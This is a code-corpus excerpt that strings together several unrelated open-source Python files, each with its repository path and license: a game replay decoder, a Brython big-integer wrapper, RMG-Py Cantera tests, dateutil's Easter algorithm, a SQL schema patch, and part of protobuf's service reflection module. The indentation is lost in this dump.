('_struct',[[('m_leaveReason',1,-1)]]), #166
('_struct',[[('m_observe',24,-7),('m_name',9,-6),('m_toonHandle',121,-5),('m_clanTag',41,-4),('m_clanLogo',42,-3),('m_hijack',13,-2),('m_hijackCloneGameUserId',59,-1)]]), #167
('_optional',[83]), #168
('_struct',[[('m_state',24,-2),('m_sequence',168,-1)]]), #169
('_struct',[[('m_sequence',168,-2),('m_target',88,-1)]]), #170
('_struct',[[('m_sequence',168,-2),('m_target',89,-1)]]), #171
('_struct',[[('m_catalog',10,-4),('m_entry',79,-3),('m_field',9,-2),('m_value',9,-1)]]), #172
('_struct',[[('m_index',6,-1)]]), #173
('_struct',[[('m_shown',13,-1)]]), #174
('_struct',[[('m_recipient',12,-2),('m_string',30,-1)]]), #175
('_struct',[[('m_recipient',12,-2),('m_point',114,-1)]]), #176
('_struct',[[('m_progress',87,-1)]]), #177
('_struct',[[('m_status',24,-1)]]), #178
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_buttonLink',79,-1)]]), #179
('_struct',[[('m_behaviorLink',79,-2),('m_buttonLink',79,-1)]]), #180
('_choice',[(0,2),{0:('None',85),1:('Ability',179),2:('Behavior',180),3:('Vitals',159)}]), #181
('_struct',[[('m_announcement',181,-4),('m_announceLink',79,-3),('m_otherUnitTag',6,-2),('m_unitTag',6,-1)]]), #182
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_unitTypeName',29,2),('m_controlPlayerId',1,3),('m_upkeepPlayerId',1,4),('m_x',10,5),('m_y',10,6)]]), #183
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_x',10,2),('m_y',10,3)]]), #184
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_killerPlayerId',59,2),('m_x',10,3),('m_y',10,4),('m_killerUnitTagIndex',43,5),('m_killerUnitTagRecycle',43,6)]]), #185
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_controlPlayerId',1,2),('m_upkeepPlayerId',1,3)]]), #186
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_unitTypeName',29,2)]]), #187
('_struct',[[('m_playerId',1,0),('m_upgradeTypeName',29,1),('m_count',87,2)]]), #188
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1)]]), #189
('_array',[(0,10),87]), #190
('_struct',[[('m_firstUnitIndex',6,0),('m_items',190,1)]]), #191
('_struct',[[('m_playerId',1,0),('m_type',6,1),('m_userId',43,2),('m_slotId',43,3)]]), #192
('_struct',[[('m_key',29,0)]]), #193
('_struct',[[('__parent',193,0),('m_value',29,1)]]), #194
('_array',[(0,6),194]), #195
('_optional',[195]), #196
('_struct',[[('__parent',193,0),('m_value',87,1)]]), #197
('_array',[(0,6),197]), #198
('_optional',[198]), #199
('_struct',[[('m_eventName',29,0),('m_stringData',196,1),('m_intData',199,2),('m_fixedData',199,3)]]), #200
('_struct',[[('m_value',6,0),('m_time',6,1)]]), #201
('_array',[(0,6),201]), #202
('_array',[(0,5),202]), #203
('_struct',[[('m_name',29,0),('m_values',203,1)]]), #204
('_array',[(0,21),204]), #205
('_struct',[[('m_instanceList',205,0)]]), #206
]
# Map from protocol NNet.Game.*Event eventid to (typeid, name)
game_event_types = {
5: (78, 'NNet.Game.SUserFinishedLoadingSyncEvent'),
7: (77, 'NNet.Game.SUserOptionsEvent'),
9: (70, 'NNet.Game.SBankFileEvent'),
10: (72, 'NNet.Game.SBankSectionEvent'),
11: (73, 'NNet.Game.SBankKeyEvent'),
12: (74, 'NNet.Game.SBankValueEvent'),
13: (76, 'NNet.Game.SBankSignatureEvent'),
14: (81, 'NNet.Game.SCameraSaveEvent'),
21: (82, 'NNet.Game.SSaveGameEvent'),
22: (78, 'NNet.Game.SSaveGameDoneEvent'),
23: (78, 'NNet.Game.SLoadGameDoneEvent'),
25: (84, 'NNet.Game.SCommandManagerResetEvent'),
26: (92, 'NNet.Game.SGameCheatEvent'),
27: (98, 'NNet.Game.SCmdEvent'),
28: (106, 'NNet.Game.SSelectionDeltaEvent'),
29: (107, 'NNet.Game.SControlGroupUpdateEvent'),
30: (109, 'NNet.Game.SSelectionSyncCheckEvent'),
32: (110, 'NNet.Game.STriggerChatMessageEvent'),
34: (111, 'NNet.Game.SSetAbsoluteGameSpeedEvent'),
35: (113, 'NNet.Game.SAddAbsoluteGameSpeedEvent'),
36: (115, 'NNet.Game.STriggerPingEvent'),
37: (116, 'NNet.Game.SBroadcastCheatEvent'),
38: (117, 'NNet.Game.SAllianceEvent'),
39: (118, 'NNet.Game.SUnitClickEvent'),
40: (119, 'NNet.Game.SUnitHighlightEvent'),
41: (120, 'NNet.Game.STriggerReplySelectedEvent'),
43: (125, 'NNet.Game.SHijackReplayGameEvent'),
44: (78, 'NNet.Game.STriggerSkippedEvent'),
45: (128, 'NNet.Game.STriggerSoundLengthQueryEvent'),
46: (135, 'NNet.Game.STriggerSoundOffsetEvent'),
47: (136, 'NNet.Game.STriggerTransmissionOffsetEvent'),
48: (137, 'NNet.Game.STriggerTransmissionCompleteEvent'),
49: (141, 'NNet.Game.SCameraUpdateEvent'),
50: (78, 'NNet.Game.STriggerAbortMissionEvent'),
55: (127, 'NNet.Game.STriggerDialogControlEvent'),
56: (131, 'NNet.Game.STriggerSoundLengthSyncEvent'),
57: (142, 'NNet.Game.STriggerConversationSkippedEvent'),
58: (145, 'NNet.Game.STriggerMouseClickedEvent'),
59: (146, 'NNet.Game.STriggerMouseMovedEvent'),
60: (147, 'NNet.Game.SAchievementAwardedEvent'),
61: (148, 'NNet.Game.STriggerHotkeyPressedEvent'),
62: (149, 'NNet.Game.STriggerTargetModeUpdateEvent'),
64: (150, 'NNet.Game.STriggerSoundtrackDoneEvent'),
66: (151, 'NNet.Game.STriggerKeyPressedEvent'),
67: (156, 'NNet.Game.STriggerMovieFunctionEvent'),
76: (152, 'NNet.Game.STriggerCommandErrorEvent'),
86: (78, 'NNet.Game.STriggerMovieStartedEvent'),
87: (78, 'NNet.Game.STriggerMovieFinishedEvent'),
88: (154, 'NNet.Game.SDecrementGameTimeRemainingEvent'),
89: (155, 'NNet.Game.STriggerPortraitLoadedEvent'),
90: (157, 'NNet.Game.STriggerCustomDialogDismissedEvent'),
91: (158, 'NNet.Game.STriggerGameMenuItemSelectedEvent'),
92: (160, 'NNet.Game.STriggerMouseWheelEvent'),
95: (161, 'NNet.Game.STriggerButtonPressedEvent'),
96: (78, 'NNet.Game.STriggerGameCreditsFinishedEvent'),
97: (162, 'NNet.Game.STriggerCutsceneBookmarkFiredEvent'),
98: (163, 'NNet.Game.STriggerCutsceneEndSceneFiredEvent'),
99: (164, 'NNet.Game.STriggerCutsceneConversationLineEvent'),
100: (165, 'NNet.Game.STriggerCutsceneConversationLineMissingEvent'),
101: (166, 'NNet.Game.SGameUserLeaveEvent'),
102: (167, 'NNet.Game.SGameUserJoinEvent'),
103: (169, 'NNet.Game.SCommandManagerStateEvent'),
104: (170, 'NNet.Game.SCmdUpdateTargetPointEvent'),
105: (171, 'NNet.Game.SCmdUpdateTargetUnitEvent'),
106: (132, 'NNet.Game.STriggerAnimLengthQueryByNameEvent'),
107: (133, 'NNet.Game.STriggerAnimLengthQueryByPropsEvent'),
108: (134, 'NNet.Game.STriggerAnimOffsetEvent'),
109: (172, 'NNet.Game.SCatalogModifyEvent'),
110: (173, 'NNet.Game.SHeroTalentTreeSelectedEvent'),
111: (78, 'NNet.Game.STriggerProfilerLoggingFinishedEvent'),
112: (174, 'NNet.Game.SHeroTalentTreeSelectionPanelToggledEvent'),
}
# The typeid of the NNet.Game.EEventId enum.
game_eventid_typeid = 0
# Map from protocol NNet.Game.*Message eventid to (typeid, name)
message_event_types = {
0: (175, 'NNet.Game.SChatMessage'),
1: (176, 'NNet.Game.SPingMessage'),
2: (177, 'NNet.Game.SLoadingProgressMessage'),
3: (78, 'NNet.Game.SServerPingMessage'),
4: (178, 'NNet.Game.SReconnectNotifyMessage'),
5: (182, 'NNet.Game.SPlayerAnnounceMessage'),
}
# The typeid of the NNet.Game.EMessageId enum.
message_eventid_typeid = 1
# Map from protocol NNet.Replay.Tracker.*Event eventid to (typeid, name)
tracker_event_types = {
1: (183, 'NNet.Replay.Tracker.SUnitBornEvent'),
2: (185, 'NNet.Replay.Tracker.SUnitDiedEvent'),
3: (186, 'NNet.Replay.Tracker.SUnitOwnerChangeEvent'),
4: (187, 'NNet.Replay.Tracker.SUnitTypeChangeEvent'),
5: (188, 'NNet.Replay.Tracker.SUpgradeEvent'),
6: (183, 'NNet.Replay.Tracker.SUnitInitEvent'),
7: (189, 'NNet.Replay.Tracker.SUnitDoneEvent'),
8: (191, 'NNet.Replay.Tracker.SUnitPositionsEvent'),
9: (192, 'NNet.Replay.Tracker.SPlayerSetupEvent'),
10: (200, 'NNet.Replay.Tracker.SStatGameEvent'),
11: (206, 'NNet.Replay.Tracker.SScoreResultEvent'),
12: (184, 'NNet.Replay.Tracker.SUnitRevivedEvent'),
}
# The typeid of the NNet.Replay.Tracker.EEventId enum.
tracker_eventid_typeid = 2
# The typeid of NNet.SVarUint32 (the type used to encode gameloop deltas).
svaruint32_typeid = 7
# The typeid of NNet.Replay.SGameUserId (the type used to encode player ids).
replay_userid_typeid = 8
# The typeid of NNet.Replay.SHeader (the type used to store replay game version and length).
replay_header_typeid = 18
# The typeid of NNet.Game.SDetails (the type used to store overall replay details).
game_details_typeid = 40
# The typeid of NNet.Replay.SInitData (the type used to store the inital lobby).
replay_initdata_typeid = 69
def _varuint32_value(value):
# Returns the numeric value from a SVarUint32 instance.
for k,v in value.iteritems():
return v
return 0
def _decode_event_stream(decoder, eventid_typeid, event_types, decode_user_id):
# Decodes events prefixed with a gameloop and possibly userid
gameloop = 0
while not decoder.done():
start_bits = decoder.used_bits()
# decode the gameloop delta before each event
delta = _varuint32_value(decoder.instance(svaruint32_typeid))
gameloop += delta
# decode the userid before each event
if decode_user_id:
userid = decoder.instance(replay_userid_typeid)
# decode the event id
eventid = decoder.instance(eventid_typeid)
typeid, typename = event_types.get(eventid, (None, None))
if typeid is None:
raise CorruptedError('eventid(%d) at %s' % (eventid, decoder))
# decode the event struct instance
event = decoder.instance(typeid)
event['_event'] = typename
event['_eventid'] = eventid
# insert gameloop and userid
event['_gameloop'] = gameloop
if decode_user_id:
event['_userid'] = userid
# the next event is byte aligned
decoder.byte_align()
# insert bits used in stream
event['_bits'] = decoder.used_bits() - start_bits
yield event
def decode_replay_game_events(contents):
"""Decodes and yields each game event from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
game_eventid_typeid,
game_event_types,
decode_user_id=True):
yield event
def decode_replay_message_events(contents):
"""Decodes and yields each message event from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
message_eventid_typeid,
message_event_types,
decode_user_id=True):
yield event
def decode_replay_tracker_events(contents):
"""Decodes and yields each tracker event from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
tracker_eventid_typeid,
tracker_event_types,
decode_user_id=False):
yield event
def decode_replay_header(contents):
"""Decodes and return the replay header from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
return decoder.instance(replay_header_typeid)
def decode_replay_details(contents):
"""Decodes and returns the game details from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
return decoder.instance(game_details_typeid)
def decode_replay_initdata(contents):
"""Decodes and return the replay init data from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
return decoder.instance(replay_initdata_typeid)
def decode_replay_attributes_events(contents):
"""Decodes and yields each attribute from the contents byte string."""
buffer = BitPackedBuffer(contents, 'little')
attributes = {}
if not buffer.done():
attributes['source'] = buffer.read_bits(8)
attributes['mapNamespace'] = buffer.read_bits(32)
count = buffer.read_bits(32)
attributes['scopes'] = {}
while not buffer.done():
value = {}
value['namespace'] = buffer.read_bits(32)
value['attrid'] = attrid = buffer.read_bits(32)
scope = buffer.read_bits(8)
value['value'] = buffer.read_aligned_bytes(4)[::-1].strip('\x00')
if not scope in attributes['scopes']:
attributes['scopes'][scope] = {}
if not attrid in attributes['scopes'][scope]:
attributes['scopes'][scope][attrid] = []
attributes['scopes'][scope][attrid].append(value)
return attributes
def unit_tag(unitTagIndex, unitTagRecycle):
return (unitTagIndex << 18) + unitTagRecycle
def unit_tag_index(unitTag):
return (unitTag >> 18) & 0x00003fff
def unit_tag_recycle(unitTag):
return (unitTag) & 0x0003ffff
| mit |
40223139/39g7test | static/Brython3.1.1-20150328-091302/Lib/long_int1/__init__.py | 503 | 3858 | from browser import html, document, window
import javascript
#memorize/cache?
def _get_value(other):
if isinstance(other, LongInt):
return other.value
return other
class BigInt:
def __init__(self):
pass
def __abs__(self):
return LongInt(self.value.abs())
def __add__(self, other):
return LongInt(self.value.plus(_get_value(other)))
def __and__(self, other):
pass
def __divmod__(self, other):
_value=_get_value(other)
return LongInt(self.value.div(_value)), LongInt(self.value.mod(_value))
def __div__(self, other):
return LongInt(self.value.div(_get_value(other)))
def __eq__(self, other):
return bool(self.value.eq(_get_value(other)))
def __floordiv__(self, other):
return LongInt(self.value.div(_get_value(other)).floor())
def __ge__(self, other):
return bool(self.value.gte(_get_value(other)))
def __gt__(self, other):
return bool(self.value.gt(_get_value(other)))
def __index__(self):
if self.value.isInt():
return int(self.value.toNumber())
raise TypeError("This is not an integer")
def __le__(self, other):
return bool(self.value.lte(_get_value(other)))
def __lt__(self, other):
return bool(self.value.lt(_get_value(other)))
def __lshift__(self, shift):
if isinstance(shift, int):
_v=LongInt(2)**shift
return LongInt(self.value.times(_v.value))
def __mod__(self, other):
return LongInt(self.value.mod(_get_value(other)))
def __mul__(self, other):
return LongInt(self.value.times(_get_value(other)))
def __neg__(self, other):
return LongInt(self.value.neg(_get_value(other)))
def __or__(self, other):
pass
def __pow__(self, other):
return LongInt(self.value.pow(_get_value(other)))
def __rshift__(self, other):
pass
def __sub__(self, other):
return LongInt(self.value.minus(_get_value(other)))
def __repr__(self):
return "%s(%s)" % (self.__name__, self.value.toString(10))
def __str__(self):
return "%s(%s)" % (self.__name__, self.value.toString(10))
def __xor__(self, other):
pass
_precision=20
def get_precision(value):
if isinstance(value, LongInt):
return len(str(value.value.toString(10)))
return len(str(value))
class DecimalJS(BigInt):
def __init__(self, value=0, base=10):
global _precision
_prec=get_precision(value)
if _prec > _precision:
_precision=_prec
window.eval('Decimal.precision=%s' % _precision)
self.value=javascript.JSConstructor(window.Decimal)(value, base)
class BigNumberJS(BigInt):
def __init__(self, value=0, base=10):
self.value=javascript.JSConstructor(window.BigNumber)(value, base)
class BigJS(BigInt):
def __init__(self, value=0, base=10):
self.value=javascript.JSConstructor(window.Big)(value, base)
def __floordiv__(self, other):
_v=LongInt(self.value.div(_get_value(other)))
if _v >= 0:
return LongInt(_v.value.round(0, 0)) #round down
return LongInt(_v.value.round(0, 3)) #round up
def __pow__(self, other):
if isinstance(other, LongInt):
_value=int(other.value.toString(10))
elif isinstance(other, str):
_value=int(other)
return LongInt(self.value.pow(_value))
#_path = __file__[:__file__.rfind('/')]+'/'
_path = __BRYTHON__.brython_path + 'Lib/long_int1/'
#to use decimal.js library uncomment these 2 lines
#javascript.load(_path+'decimal.min.js', ['Decimal'])
#LongInt=DecimalJS
#to use bignumber.js library uncomment these 2 lines
javascript.load(_path+'bignumber.min.js', ['BigNumber'])
LongInt=BigNumberJS
#big.js does not have a "base" so only base 10 stuff works.
#to use big.js library uncomment these 2 lines
#javascript.load(_path+'big.min.js', ['Big'])
#LongInt=BigJS
| gpl-3.0 |
chatelak/RMG-Py | rmgpy/tools/canteraTest.py | 7 | 3597 | import unittest
import os
import numpy
from rmgpy.tools.canteraModel import findIgnitionDelay, CanteraCondition, Cantera
from rmgpy.quantity import Quantity
import rmgpy
class CanteraTest(unittest.TestCase):
def testIgnitionDelay(self):
"""
Test that findIgnitionDelay() works.
"""
t = numpy.arange(0,5,0.5)
P = numpy.array([0,0.33,0.5,0.9,2,4,15,16,16.1,16.2])
OH = numpy.array([0,0.33,0.5,0.9,2,4,15,16,7,2])
CO = OH*0.9
t_ign = findIgnitionDelay(t,P)
self.assertEqual(t_ign,2.75)
t_ign = findIgnitionDelay(t,OH,'maxHalfConcentration')
self.assertEqual(t_ign,3)
t_ign = findIgnitionDelay(t,[OH,CO], 'maxSpeciesConcentrations')
self.assertEqual(t_ign,3.5)
def testRepr(self):
"""
Test that the repr function for a CanteraCondition object can reconstitute
the same object
"""
reactorType='IdealGasReactor'
molFrac={'CC': 0.05, '[Ar]': 0.95}
P=(3,'atm')
T=(1500,'K')
terminationTime=(5e-5,'s')
condition = CanteraCondition(reactorType,
terminationTime,
molFrac,
T0=T,
P0=P)
reprCondition=eval(condition.__repr__())
self.assertEqual(reprCondition.T0.value_si,Quantity(T).value_si)
self.assertEqual(reprCondition.P0.value_si,Quantity(P).value_si)
self.assertEqual(reprCondition.V0,None)
self.assertEqual(reprCondition.molFrac,molFrac)
class RMGToCanteraTest(unittest.TestCase):
"""
Contains unit tests for the conversion of RMG species and reaction objects to Cantera objects.
"""
def setUp(self):
"""
A function run before each unit test in this class.
"""
from rmgpy.chemkin import loadChemkinFile
folder = os.path.join(os.path.dirname(rmgpy.__file__),'tools/data/various_kinetics')
chemkinPath = os.path.join(folder, 'chem_annotated.inp')
dictionaryPath = os.path.join(folder, 'species_dictionary.txt')
transportPath = os.path.join(folder, 'tran.dat')
species, reactions = loadChemkinFile(chemkinPath, dictionaryPath,transportPath)
self.rmg_ctSpecies = [spec.toCantera() for spec in species]
self.rmg_ctReactions = []
for rxn in reactions:
convertedReactions = rxn.toCantera(species)
if isinstance(convertedReactions,list):
self.rmg_ctReactions.extend(convertedReactions)
else:
self.rmg_ctReactions.append(convertedReactions)
job = Cantera()
job.loadChemkinModel(chemkinPath, transportFile=transportPath,quiet=True)
self.ctSpecies = job.model.species()
self.ctReactions = job.model.reactions()
def testSpeciesConversion(self):
"""
Test that species objects convert properly
"""
from rmgpy.tools.canteraModel import checkEquivalentCanteraSpecies
for i in range(len(self.ctSpecies)):
self.assertTrue(checkEquivalentCanteraSpecies(self.ctSpecies[i],self.rmg_ctSpecies[i]))
def testReactionConversion(self):
"""
Test that species objects convert properly
"""
from rmgpy.tools.canteraModel import checkEquivalentCanteraReaction
for i in range(len(self.ctReactions)):
self.assertTrue(checkEquivalentCanteraReaction(self.ctReactions[i],self.rmg_ctReactions[i]))
| mit |
qyuz/reXChat | dateutil/easter.py | 291 | 2633 | """
Copyright (c) 2003-2007 Gustavo Niemeyer <[email protected]>
This module offers extensions to the standard python 2.3+
datetime module.
"""
__author__ = "Gustavo Niemeyer <[email protected]>"
__license__ = "PSF License"
import datetime
__all__ = ["easter", "EASTER_JULIAN", "EASTER_ORTHODOX", "EASTER_WESTERN"]
EASTER_JULIAN = 1
EASTER_ORTHODOX = 2
EASTER_WESTERN = 3
def easter(year, method=EASTER_WESTERN):
"""
This method was ported from the work done by GM Arts,
on top of the algorithm by Claus Tondering, which was
based in part on the algorithm of Ouding (1940), as
quoted in "Explanatory Supplement to the Astronomical
Almanac", P. Kenneth Seidelmann, editor.
This algorithm implements three different easter
calculation methods:
1 - Original calculation in Julian calendar, valid in
dates after 326 AD
2 - Original method, with date converted to Gregorian
calendar, valid in years 1583 to 4099
3 - Revised method, in Gregorian calendar, valid in
years 1583 to 4099 as well
These methods are represented by the constants:
EASTER_JULIAN = 1
EASTER_ORTHODOX = 2
EASTER_WESTERN = 3
The default method is method 3.
More about the algorithm may be found at:
http://users.chariot.net.au/~gmarts/eastalg.htm
and
http://www.tondering.dk/claus/calendar.html
"""
if not (1 <= method <= 3):
raise ValueError, "invalid method"
# g - Golden year - 1
# c - Century
# h - (23 - Epact) mod 30
# i - Number of days from March 21 to Paschal Full Moon
# j - Weekday for PFM (0=Sunday, etc)
# p - Number of days from March 21 to Sunday on or before PFM
# (-6 to 28 methods 1 & 3, to 56 for method 2)
# e - Extra days to add for method 2 (converting Julian
# date to Gregorian date)
y = year
g = y % 19
e = 0
if method < 3:
# Old method
i = (19*g+15)%30
j = (y+y//4+i)%7
if method == 2:
# Extra dates to convert Julian to Gregorian date
e = 10
if y > 1600:
e = e+y//100-16-(y//100-16)//4
else:
# New method
c = y//100
h = (c-c//4-(8*c+13)//25+19*g+15)%30
i = h-(h//28)*(1-(h//28)*(29//(h+1))*((21-g)//11))
j = (y+y//4+i+2-c+c//4)%7
# p can be from -6 to 56 corresponding to dates 22 March to 23 May
# (later dates apply to method 2, although 23 May never actually occurs)
p = i-j+e
d = 1+(p+27+(p+6)//40)%31
m = 3+(p+26)//30
return datetime.date(int(y),int(m),int(d))
| gpl-2.0 |
indradhanush/filesync-server | src/backends/db/schemas/fsync_shard/patch_11.py | 6 | 1270 | # Copyright 2008-2015 Canonical
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further info, check http://launchpad.net/filesync-server
"""Add ObjectsToDelete table for the dead nodes cleanup scripts.
This table will be used until we can use temporary tables via pgbouncer or
directly talking to the shards.
"""
SQL = ["CREATE TABLE ObjectsToDelete (id uuid, content_hash BYTEA)",
"CREATE INDEX objectstodelete_idx ON ObjectsToDelete(id)",
"GRANT SELECT,INSERT,DELETE,UPDATE,TRUNCATE ON TABLE ObjectsToDelete TO"
" storage, webapp;"]
def apply(store):
"""Apply the patch."""
for sql in SQL:
store.execute(sql)
| agpl-3.0 |
kku1993/libquic | src/third_party/protobuf/python/google/protobuf/service_reflection.py | 243 | 11023 | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains metaclasses used to create protocol service and service stub
classes from ServiceDescriptor objects at runtime.
The GeneratedServiceType and GeneratedServiceStubType metaclasses are used to
inject all useful functionality into the classes output by the protocol
compiler at compile-time.
"""
__author__ = '[email protected] (Petar Petrov)'
class GeneratedServiceType(type):
"""Metaclass for service classes created at runtime from ServiceDescriptors.
Implementations for all methods described in the Service class are added here
by this class. We also create properties to allow getting/setting all fields
in the protocol message.
The protocol compiler currently uses this metaclass to create protocol service
classes at runtime. Clients can also manually create their own classes at
runtime, as in this example:
mydescriptor = ServiceDescriptor(.....)
class MyProtoService(service.Service):
__metaclass__ = GeneratedServiceType
DESCRIPTOR = mydescriptor
myservice_instance = MyProtoService()
...
"""
_DESCRIPTOR_KEY = 'DESCRIPTOR'
def __init__(cls, name, bases, dictionary):
"""Creates a message service class.
Args:
name: Name of the class (ignored, but required by the metaclass
protocol).
bases: Base classes of the class being constructed.
dictionary: The class dictionary of the class being constructed.
dictionary[_DESCRIPTOR_KEY] must contain a ServiceDescriptor object
describing this protocol service type.
"""
# Don't do anything if this class doesn't have a descriptor. This happens
# when a service class is subclassed.
if GeneratedServiceType._DESCRIPTOR_KEY not in dictionary:
return
descriptor = dictionary[GeneratedServiceType._DESCRIPTOR_KEY]
service_builder = _ServiceBuilder(descriptor)
service_builder.BuildService(cls)
class GeneratedServiceStubType(GeneratedServiceType):
"""Metaclass for service stubs created at runtime from ServiceDescriptors.
This class has similar responsibilities as GeneratedServiceType, except that
it creates the service stub classes.
"""
_DESCRIPTOR_KEY = 'DESCRIPTOR'
def __init__(cls, name, bases, dictionary):
"""Creates a message service stub class.
Args:
name: Name of the class (ignored, here).
bases: Base classes of the class being constructed.
dictionary: The class dictionary of the class being constructed.
dictionary[_DESCRIPTOR_KEY] must contain a ServiceDescriptor object
describing this protocol service type.
"""
super(GeneratedServiceStubType, cls).__init__(name, bases, dictionary)
# Don't do anything if this class doesn't have a descriptor. This happens
# when a service stub is subclassed.
if GeneratedServiceStubType._DESCRIPTOR_KEY not in dictionary:
return
descriptor = dictionary[GeneratedServiceStubType._DESCRIPTOR_KEY]
service_stub_builder = _ServiceStubBuilder(descriptor)
service_stub_builder.BuildServiceStub(cls)
class _ServiceBuilder(object):
"""This class constructs a protocol service class using a service descriptor.
Given a service descriptor, this class constructs a class that represents
the specified service descriptor. One service builder instance constructs
exactly one service class. That means all instances of that class share the
same builder.
"""
def __init__(self, service_descriptor):
"""Initializes an instance of the service class builder.
Args:
service_descriptor: ServiceDescriptor to use when constructing the
service class.
"""
self.descriptor = service_descriptor
def BuildService(self, cls):
"""Constructs the service class.
Args:
cls: The class that will be constructed.
"""
# CallMethod needs to operate with an instance of the Service class. This
# internal wrapper function exists only to be able to pass the service
# instance to the method that does the real CallMethod work.
def _WrapCallMethod(srvc, method_descriptor,
rpc_controller, request, callback):
return self._CallMethod(srvc, method_descriptor,
rpc_controller, request, callback)
self.cls = cls
cls.CallMethod = _WrapCallMethod
cls.GetDescriptor = staticmethod(lambda: self.descriptor)
cls.GetDescriptor.__doc__ = "Returns the service descriptor."
cls.GetRequestClass = self._GetRequestClass
cls.GetResponseClass = self._GetResponseClass
for method in self.descriptor.methods:
setattr(cls, method.name, self._GenerateNonImplementedMethod(method))
def _CallMethod(self, srvc, method_descriptor,
rpc_controller, request, callback):
"""Calls the method described by a given method descriptor.
Args:
srvc: Instance of the service for which this method is called.
method_descriptor: Descriptor that represent the method to call.
rpc_controller: RPC controller to use for this method's execution.
request: Request protocol message.
callback: A callback to invoke after the method has completed.
"""
if method_descriptor.containing_service != self.descriptor:
raise RuntimeError(
'CallMethod() given method descriptor for wrong service type.')
method = getattr(srvc, method_descriptor.name)
return method(rpc_controller, request, callback)
def _GetRequestClass(self, method_descriptor):
"""Returns the class of the request protocol message.
Args:
method_descriptor: Descriptor of the method for which to return the
request protocol message class.
Returns:
A class that represents the input protocol message of the specified
method.
"""
if method_descriptor.containing_service != self.descriptor:
raise RuntimeError(
'GetRequestClass() given method descriptor for wrong service type.')
return method_descriptor.input_type._concrete_class
def _GetResponseClass(self, method_descriptor):
"""Returns the class of the response protocol message.
Args:
method_descriptor: Descriptor of the method for which to return the
response protocol message class.
Returns:
A class that represents the output protocol message of the specified
method.
"""
if method_descriptor.containing_service != self.descriptor:
raise RuntimeError(
'GetResponseClass() given method descriptor for wrong service type.')
return method_descriptor.output_type._concrete_class
def _GenerateNonImplementedMethod(self, method):
"""Generates and returns a method that can be set for a service methods.
Args:
method: Descriptor of the service method for which a method is to be
generated.
Returns:
A method that can be added to the service class.
"""
return lambda inst, rpc_controller, request, callback: (
self._NonImplementedMethod(method.name, rpc_controller, callback))
def _NonImplementedMethod(self, method_name, rpc_controller, callback):
"""The body of all methods in the generated service class.
Args:
method_name: Name of the method being executed.
rpc_controller: RPC controller used to execute this method.
callback: A callback which will be invoked when the method finishes.
"""
rpc_controller.SetFailed('Method %s not implemented.' % method_name)
callback(None)
class _ServiceStubBuilder(object):
"""Constructs a protocol service stub class using a service descriptor.
Given a service descriptor, this class constructs a suitable stub class.
A stub is just a type-safe wrapper around an RpcChannel which emulates a
local implementation of the service.
One service stub builder instance constructs exactly one class. It means all
instances of that class share the same service stub builder.
"""
def __init__(self, service_descriptor):
"""Initializes an instance of the service stub class builder.
Args:
service_descriptor: ServiceDescriptor to use when constructing the
stub class.
"""
self.descriptor = service_descriptor
def BuildServiceStub(self, cls):
"""Constructs the stub class.
Args:
cls: The class that will be constructed.
"""
def _ServiceStubInit(stub, rpc_channel):
stub.rpc_channel = rpc_channel
self.cls = cls
cls.__init__ = _ServiceStubInit
for method in self.descriptor.methods:
setattr(cls, method.name, self._GenerateStubMethod(method))
def _GenerateStubMethod(self, method):
return (lambda inst, rpc_controller, request, callback=None:
self._StubMethod(inst, method, rpc_controller, request, callback))
def _StubMethod(self, stub, method_descriptor,
rpc_controller, request, callback):
"""The body of all service methods in the generated stub class.
Args:
stub: Stub instance.
method_descriptor: Descriptor of the invoked method.
rpc_controller: Rpc controller to execute the method.
request: Request protocol message.
